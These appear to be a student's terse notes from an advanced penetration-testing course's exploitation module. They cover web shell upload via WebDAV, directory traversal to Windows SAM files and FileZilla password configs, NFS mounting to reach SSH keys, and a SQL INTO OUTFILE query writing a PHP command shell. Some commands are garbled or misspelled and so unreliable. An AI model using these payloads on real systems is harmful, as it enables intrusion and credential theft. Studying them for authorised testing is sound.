Nathanf | Advanced Penetration Testing | Module 7 - Exploitation
exploit 1
cadaver, webDav
kali has pre built web shells in different languages
Step 1 – upload a file to server that executes code for you or allows you to execute code (webshell)
-upload a file that takes command injection via url query parameters
This can also be userd done via metasploit
-for reverse tcp set exitOnSessionto false for options so it doesnt stop listening on first response
exploit 3
Directory traversal, Dump sam files to discover usernames and passwords
Directory traversal – can also be done from url
index?../../../../../bin.etc if it says save file weve found it otherwise we havent found it
WINDOWS/system32/sam
Windows/repair/sam – save file but you need syskey to access it from
../../../../../WINDOWS/repair/system
filezilla ftp
../../../../../xamp/FileZillaFtp/FileZilla server.xml congig filezilla file stores passwords
Exploit 4
/tikiwiki
search metasploit for exploits
exploit 6
whoami = display which user you are
exploit 6
display network file system: in cli -> showmount -e ’ip’
to export network filesystem
mount -t -o noclock nfs ’ip’ :/exportDir /exportlocation
hidden files ls -a
.ssh file store keys
co
exploitation 2
open web interface – phpmyadmin can use sql injection commands
creating a system command shell which accepts a parameter via url, to sit on the server via sql
run system command ->
select ”<?php system($_GET[’cmd’]); ?” into outfile ”C:\\xamp\\htdocs\\shell.php”
\\ = escape, so you dont end up with a long file name on the system
at ftpd — daemon –bind-address ’ip’ /tmp
netstat antp
daemon = it will listen
other shell -> powershell
tfpt = Tivial file transfer protocol
